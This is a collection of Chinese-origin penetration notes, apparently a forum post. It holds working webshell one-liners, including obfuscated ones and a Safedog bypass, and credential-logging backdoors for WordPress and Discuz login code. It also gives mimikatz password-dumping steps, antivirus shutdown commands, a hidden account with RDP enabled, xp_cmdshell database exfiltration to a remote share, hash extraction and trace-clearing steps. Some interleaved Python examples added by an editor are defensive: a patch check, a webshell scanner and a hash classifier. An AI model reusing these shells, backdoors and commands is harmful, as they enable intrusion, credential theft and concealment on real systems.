echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
sc config remoteaccess start= auto
net start rasman
net start remoteaccess
Media
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

control userpasswords2    view the users' passwords

Export an Access database directly as a shell; prerequisites: table a exists in the Access database, and you know the site's real path.
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
141. When doing manual MSSQL injection, if you cannot bounce the data out, most of the time you read the records out one at a time, which is exhausting. Here is a single statement that reads out all the data:
Test 1:
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

Test 2:
create table dirs(paths varchar(100),paths1 varchar(100), id int)

delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
How to shut down McAfee: // requires SYSTEM privileges; use at or psexec -s cmd.exe
You can upload .com-type files, e.g. nc.com, to get around McAfee's restriction on executables;
net stop mcafeeframework
net stop mcshield
net stop mcafeeengineservice
net stop mctaskmanager
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D

Online password cracking: http://tools88.com/safe/vnc.php
The VNC password can be obtained directly with vncdump, or by querying the Password value under [HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] from a DOS prompt.
exec master..xp_cmdshell 'net user'
Executing commands in mssql.
Query to get the mssql password hashes:
select name,password from master.dbo.sysxlogins

backup log dbName with NO_LOG;
backup log dbName with TRUNCATE_ONLY;
DBCC SHRINKDATABASE(dbName);
mssql database shrinking

Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
Compresses the file game_db_201107170400.BAK into 1.rar, split into 200M volumes.

backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
Backs up the game database as game.bak at the path D:\WebSites\game.com\UpFileList\game.bak
Discuz!NT 3.5 penetration points:
(1) Visit site-address/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
(2) Open the rss.aspx file, copy <%@ Page Inherits="Discuz.Web.UI.RssPage" %> to a local backup, then replace it with <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
(3) Save.
(4) The one-liner backdoor is then at http://somesite.com.cn/tools/rss.aspx, password pass.

d:\rar.exe a -r d:\1.rar d:\website\
Recursively compresses website;
mind the path of rar.exe.
<?php
$telok = "0${@eval($_POST[xxoo])}";
$username = "123456";
$userpwd = "123456";
$telhao = "123456";
$telinfo = "123456";
?>
PHP one-liner: a one-line trojan inserted through unfiltered input.

Dumping the database when the web and database servers are separated
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
Restrictions meant a full shell could not be written, only a one-liner; that is actually enough to do anything, it is just not intuitive or convenient, for example for dumping the database.
What is used here is the one-liner client's expert mode (write your own code).
ini_set('display_errors', 1);
set_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
$i = 0;
$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
    $i = $i+1;
    $tmp .= implode("::", $row)."\n";
    if(!($i%500)){ // write one file per 500 rows
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
        file_put_contents($filename,$tmp);
        $tmp = '';
    }
}
mysql_free_result($result);

// delete after downloading

ini_set('display_errors', 1);
error_reporting(E_ALL);
$i = 0;
while($i<32) {
    $i = $i+1;
    $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
    unlink($filename);
}
httprint: collect operating system fingerprints
Scan all ports of 192.168.1.100:
nmap -PN -sT -sV -p0-65535 192.168.1.100
host -t ns www.owasp.org   identify the name servers and get DNS information
host -l www.owasp.org ns1.secure.net   attempt a zone transfer for owasp.org
Netcraft DNS search service: http://searchdns.netcraft.com/?host

Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (free registration required)

MSN search: http://search.msn.com syntax: "ip:x.x.x.x" (without the quotes)

Webhosting info: http://whois.webhosting.info/ syntax: http://whois.webhosting.info/x.x.x.x
DNSstuff: http://www.dnsstuff.com/ (several services available)

http://net-square.com/msnpawn/index.shtml (requires installation)

tomDNS: http://www.tomdns.net/ (some services are still not public)

SEOlogs.com: http://www.seologs.com/ip-domains.html (reverse IP/domain lookup)
set names gb2312
Use this when importing into the database gives the error "Data too long for column 'username' at row 1"; the cause is that Chinese characters are not supported.

MySQL password change:
UPDATE mysql.user SET password=PASSWORD("newpass") where user="mysqladmin";
update user set password=PASSWORD('antian365.com') where user='root';
flush privileges;
Advanced PHP one-liner backdoors

Many advanced PHP one-liners turned up during intrusions. Recorded here so they can later be searched for by keyword and removed.

1.
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
// Caidao one-liner

2.
$filename=$_GET['xbid'];
include ($filename);
// dangerous include: compiles and runs any file as PHP

3.
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
// writes the uploaded file under any name

4.
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
// Caidao one-liner

5.
include ($uid);
// dangerous include: compiles and runs any file as PHP, via POST

// one-liner embedded in a gif

6. Typical one-liners
Backdoor code:
<?php eval($_POST[sb])?>
<?php @eval($_POST[sb])?>
// error-tolerant version
<?php assert($_POST[sb]);?>
// use the expert mode of the lanker one-liner client to execute the relevant PHP statements
<?$_POST['sa']($_POST['sb']);?>
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
// with this one, when setting up the connection in the Caidao one-liner client, enter the following in the "config" field:
<O>h=@eval($_POST[c]);</O>
<script language="php">@eval($_POST[sb])</script>
// one-liner that gets around a restriction on <?

http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
Detailed usage:
1. Go to the tools directory. psexec \\127.0.0.1 cmd
2. Run mimikatz
3. Run privilege::debug
4. Run inject::process lsass.exe sekurlsa.dll
5. Run @getLogonPasswords
6. The wdigest entry is the password
7. exit to quit; do not just close the window, or the system will crash.

http://www.monyer.com/demo/monyerjs/  fairly complete JS decoding site

Automatically check for critical system patches
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
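Added example (editor's code, not from the post): the same comparison the batch one-liner above makes, reading saved systeminfo output and listing which of the KBs in that list are absent. The sample systeminfo text is constructed.

```python
import re

# The KB list from the one-liner above. Added example, not a tool from the post:
# it reads saved 'systeminfo' output and reports which of these patches are absent,
# the same check the batch for-loop makes with 'find /i'.
REQUIRED_KBS = [
    "KB2360937", "KB2478960", "KB2507938", "KB2566454", "KB2646524",
    "KB2645640", "KB2641653", "KB944653", "KB952004", "KB971657",
    "KB2620712", "KB2393802", "kb942831", "KB2503665", "KB2592799",
]

# Hotfix entries look like '[01]: KB2478960' whatever the localized header line says.
HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)", re.I)


def installed_hotfixes(systeminfo_text):
    """Return the set of KB ids listed in systeminfo output, upper-cased."""
    return {m.group(1).upper() for m in HOTFIX_RE.finditer(systeminfo_text)}


def missing_patches(systeminfo_text, required=REQUIRED_KBS):
    """Return the required KBs that are not installed, in the order given (case-insensitive)."""
    present = installed_hotfixes(systeminfo_text)
    return [kb.upper() for kb in required if kb.upper() not in present]


# Constructed sample of a systeminfo run (not taken from a real host).
SAMPLE_SYSTEMINFO = """Host Name:                 WIN-SAMPLE
OS Name:                   Microsoft Windows Server 2008 R2 Standard
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2478960
                           [02]: kb2507938
                           [03]: KB976902
Network Card(s):           1 NIC(s) Installed.
"""

if __name__ == "__main__":
    for kb in missing_patches(SAMPLE_SYSTEMINFO):
        print(kb, "Not Installed!")
```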
One-liner aspx backdoor that gets past Safedog
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
Logging WordPress login passwords from a webshell
Record WordPress login passwords from a webshell to make further social engineering easier.
Add the following at line 539 of wp-login.php:
// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
@fwrite(fopen('pwd.txt',"a+"),$txt);
}
The password-logging code fires when action=login; you can also put it in the default branch of the switch...case statement.
That is, search for case 'login' and insert it directly below; the recorded passwords end up in pwd.txt.
Modifying wp-login.php is really not a good approach, it is easily discovered. There are other methods; this is just a record.
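Added defensive example (editor's code, not from the post): a small scanner that looks for the keyword patterns of the one-liners collected under "Advanced PHP one-liner backdoors" above and for the wp-login.php password-logging insert just described. The rule names and the three sample files are constructed for this example.

```python
import re

# Signatures for the one-liner patterns listed above and for the password-logging
# insert into wp-login.php. Added example, not a tool from the post.
RULES = [
    ("eval/assert on request input",
     re.compile(r"\b(?:eval|assert)\s*\(\s*@?\$_(?:POST|GET|REQUEST|COOKIE)\b")),
    ("eval hidden in string interpolation",            # "0${@eval($_POST[xxoo])}"
     re.compile(r"\$\{\s*@?eval\s*\(")),
    ("variable function called with request input",   # $_POST['sa']($_POST['sb'])
     re.compile(r"\$_(?:POST|GET|REQUEST)\[[^\]]+\]\s*\(")),
    ("function name built from single-char strings",  # "p"."r"."e"."g"."_"...
     re.compile(r'"[A-Za-z_]"(?:\s*\.\s*"[A-Za-z_]"){3,}')),
    ("preg_replace /e pattern fed request input",     # ("/[discuz]/e",$_POST['h'],...)
     re.compile(r"""\(\s*["']/[^"']*/[A-Za-z]*e[A-Za-z]*["']\s*,\s*\$_(?:POST|GET|REQUEST)""")),
    ("include of a variable path",                    # include ($filename)
     re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*\$")),
    ("php code via <script language=\"php\">",
     re.compile(r"<script\s+language\s*=\s*[\"']php[\"']", re.I)),
    ("ASP.NET assembly loaded from request body",     # Assembly.Load(Request.BinaryRead(...))
     re.compile(r"Assembly\.Load\s*\(\s*Request\.BinaryRead")),
]
# File-level rule: a password taken from the request plus a file write in the same file.
PWD_FIELD = re.compile(r"\$_POST\[['\"]?(?:pwd|password|passwd)['\"]?\]|\$password\b")
FILE_WRITE = re.compile(r"\b(?:fwrite|file_put_contents)\s*\(")


def scan(source):
    """Return sorted (line_number, rule_name) hits for one file's contents; 0 = whole file."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, rx in RULES:
            if rx.search(line):
                hits.append((lineno, name))
    if PWD_FIELD.search(source) and FILE_WRITE.search(source):
        hits.append((0, "request password written to a file"))
    return sorted(hits)


# Constructed samples modelled on the snippets above (not files from any real site).
SAMPLE_OBFUSCATED = '''<?php $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
'''
SAMPLE_LOGGER = '''<?php
$log_pwd=$_POST['pwd'];
@fwrite(fopen('pwd.txt',"a+"),$log_pwd);
'''
SAMPLE_CLEAN = '''<?php
$u = $_POST['log'];
if ($u === '') { exit; }
'''

if __name__ == "__main__":
    for label, src in (("obfuscated", SAMPLE_OBFUSCATED), ("logger", SAMPLE_LOGGER), ("clean", SAMPLE_CLEAN)):
        print(label, scan(src))
```

Run it over a web root with os.walk and review every hit by hand; the single-char-string and /e rules rarely fire on legitimate code.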
Using the IIS6 file parsing vulnerability to bypass Safedog:
;antian365.asp;antian365.jpg

Grabbing and cracking the hashes of the highest-privilege accounts in various database types
1. SQL Server 2000
SELECT password from master.dbo.sysxlogins where name='sa'
0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0x0100 - constant header
34767D5C - salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341 - case sensitive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A - upper case hash
Crack the upper case hash in 'cain and abel' and then work out the case sensitive hash.
SQL Server 2005:
SELECT password_hash FROM sys.sql_logins where name='sa'
0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0x0100 - constant header
993BF231 - salt
5F36CC441485B35C4D84687DC02C78B0E680411F - case sensitive hash
Crack the case sensitive hash in cain; try brute force and dictionary based attacks.

Update, following bernardo's comments:
use the function fn_varbintohexstr() to cast the password to a hex string,
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password) from sysxlogins

MySQL:

In MySQL you can generate hashes internally using the password(), md5(), or sha1() functions. password() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

*mysql < 4.1

mysql> SELECT PASSWORD('mypass');
+--------------------+
| PASSWORD('mypass') |
+--------------------+
| 6f8c114b58f2ce9e   |
+--------------------+

*mysql >= 4.1

mysql> SELECT PASSWORD('mypass');
+-------------------------------------------+
| PASSWORD('mypass')                        |
+-------------------------------------------+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+-------------------------------------------+

Select user, password from mysql.user
The hashes can be cracked in 'cain and abel'.
Postgres:
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser (usually called "postgres" or "pgsql") to read this table.
select usename, passwd from pg_shadow;
 usename  |               passwd
----------+-------------------------------------
 testuser | md5fabb6d7172aadfda4753bf0507ed4396
Use mdcrack to crack these hashes:
$ wine MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:
select name, password, spare4 from sys.user$
Hashes can be cracked using 'cain and abel' or thc-orakelcrackert11g.
More on Oracle later, I am a bit bored....
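Added example (editor's code, not from the post) that recognizes the storage formats quoted above from a stored hash value, splits the SQL Server 2000/2005 layout into header, salt and digests as the field breakdown above does, and reproduces the MySQL 4.1+ PASSWORD() value shown for 'mypass'. The format names and the legacy_logins audit helper are the editor's own choices.

```python
import hashlib
import re

# Hash layouts quoted in the section above. Added example, not a tool from the post:
# it tells which storage format a stored credential uses, so an audit can list the
# logins still held in the weaker legacy layouts.
FORMATS = [
    ("mssql2000", re.compile(r"^0x0100[0-9a-f]{88}$", re.I)),  # header+salt+2 SHA-1 digests
    ("mssql2005", re.compile(r"^0x0100[0-9a-f]{48}$", re.I)),  # header+salt+1 SHA-1 digest
    ("mysql_old", re.compile(r"^[0-9a-f]{16}$", re.I)),        # PASSWORD() before MySQL 4.1
    ("mysql41", re.compile(r"^\*[0-9a-f]{40}$", re.I)),        # '*' + SHA1(SHA1(password))
    ("postgres_md5", re.compile(r"^md5[0-9a-f]{32}$", re.I)),  # md5(password + username)
]
# Worth flagging: SQL 2000 also stores an upper-cased digest (case entropy lost) and
# pre-4.1 MySQL values are short unsalted hashes.
LEGACY = {"mssql2000", "mysql_old"}

# The SQL Server 'sa' hashes printed above, written out by field (values copied from the post).
MSSQL2000_SAMPLE = ("0x0100" "34767D5C"
                    "0CFA5FDCA28C4A56085E65E882E71CB0ED250341"
                    "2FD54D6119FFF04129A1D72E7C3194F7284A7F3A")
MSSQL2005_SAMPLE = "0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F"


def classify_db_hash(value):
    """Return the format name for one stored hash, or 'unknown'."""
    value = value.strip()
    for name, rx in FORMATS:
        if rx.match(value):
            return name
    return "unknown"


def parse_mssql_hash(value):
    """Split a SQL Server 2000/2005 pwdencrypt value into version, salt and digests."""
    fmt = classify_db_hash(value)
    if fmt not in ("mssql2000", "mssql2005"):
        raise ValueError("not a SQL Server 2000/2005 hash")
    body = value.strip().lower()[6:]  # drop the constant '0x0100' header
    fields = {"version": fmt, "salt": body[:8], "case_sensitive": body[8:48]}
    if fmt == "mssql2000":
        fields["upper_case"] = body[48:88]
    return fields


def mysql41_hash(password):
    """Reproduce MySQL 4.1+ PASSWORD(): '*' + hex(SHA1(SHA1(password))), upper-cased."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def legacy_logins(rows):
    """rows: (login, stored_hash) pairs, e.g. from 'select user, password from mysql.user'."""
    return [login for login, h in rows if classify_db_hash(h) in LEGACY]


if __name__ == "__main__":
    print(parse_mssql_hash(MSSQL2000_SAMPLE))
    print(mysql41_hash("mypass"))  # the '*6C8989...' value shown above
```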
Enabling xp_cmdshell in SQL Server 2005/2008
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
SQL Server 2008 log clearing; always back up before clearing.
If SQL Express 2008 is installed on Windows Server 2008 Standard, delete it here:
X:\Users\[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin

For versions before SQL Server 2008:
SQL Server 2005:
Delete X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
SQL Server 2000:
Clear the corresponding entries under the registry key HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\.
This post was last edited by simeon on 2013-1-3 09:51

Windows 2008 file permission modification
1. http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2. http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
Part 1: first check whether the right-click menu has a "管理员取得所有权" (take ownership as administrator) entry; if it does not, import the following:

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

Import the .reg above to get a "管理员取得所有权" (take ownership as administrator) entry in the Win7 right-click menu.
Part 2: search the C:\Windows directory for "notepad.exe"; you should find four "notepad.exe" and four "notepad.exe.mui" files.
1. The "notepad.exe" in C:\Windows does not need to be replaced.
2. The "notepad.exe" in C:\Windows\System32 does not need to be replaced.
3. Leave the four "notepad.exe.mui" files alone.
4. The ones to replace are the "notepad.exe" files in these two folders: C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4 and C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a.
To replace them, first take administrator ownership of the two folders, then rename "Notepad2.exe" to "notepad.exe" and copy it into both folders.
After replacing, go back to the desktop, create a new txt file and open it to see whether it has changed.
Disabling the security policy on Windows 2008:
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Modify client.php in the uc_client directory: below the line
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
insert the code below; csslog.php is then generated automatically under the site's ./data/cache/ directory.
You can add a view.php in the ipdata directory to view the records; its password is falw.
if(getenv('HTTP_CLIENT_IP')) {
    $onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
    $onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
    $onlineip = getenv('REMOTE_ADDR');
} else {
    $onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
$showtime=date("Y-m-d H:i:s");
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$handle=fopen('./data/cache/csslog.php','a+');
$write=fwrite($handle,$record);